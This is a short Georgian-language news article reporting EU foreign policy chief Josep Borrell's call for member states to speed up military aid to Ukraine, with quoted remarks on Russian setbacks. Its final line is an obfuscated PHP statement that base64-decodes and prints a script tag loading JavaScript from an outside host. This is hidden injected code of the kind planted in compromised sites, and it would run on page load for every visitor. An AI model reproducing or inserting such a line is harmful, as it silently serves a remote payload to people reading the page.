celsiusi
ავერსი საქკაბელი
საგარეო საქმეთა და უსაფრთხოების პოლიტიკის საკითხებში ევროკავშირის უმაღლესი წარმომადგენელი ჯოზეფ ბორელი ორგანიზაციის წევრ სახელმწიფოებს უკრაინისთვის სამხედრო დახმარების გააქტიურებისკენ მოუწოდებს.
 
ბორელის თქმით, ერთ დღესაც და კვირასაც კი მნიშვნელობა აქვს, რადგან უკრაინაში ზამთრის დადგომასთან ერთად, ქვეყნის აღმოსავლეთით საომარი მოქმედებების წარმოება გართულდება.
 
„მათ გაცილებით მეტ წარმატებას მიაღწიეს, ვიდრე ამას ჩვენ თვითონაც ველოდით და ამიტომ, თავიდან არჩეული სტრატეგია სწორია. ახლა ჩვენ უნდა გავაორმაგოთ ჩვენი ძალისხმევა და არ დავაყოვნოთ, იმიტომ, რომ ვხედავთ, რომ ეს დახმარება ეფექტურია.
 
 
როცა პუტინმა ეს ომი დაიწყო, ვის შეეძლო, ეწინასწარმეტყველა, რომ რუსეთის არმია იძულებული გახდებოდა, თავდაცვაზე გადასულიყო და ფაქტობრივად, უკან დაეხია? ასეთ რამეს საერთოდ ვინ წარმოიდგენდა?“ – განაცხადა ბორელმა.
381
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");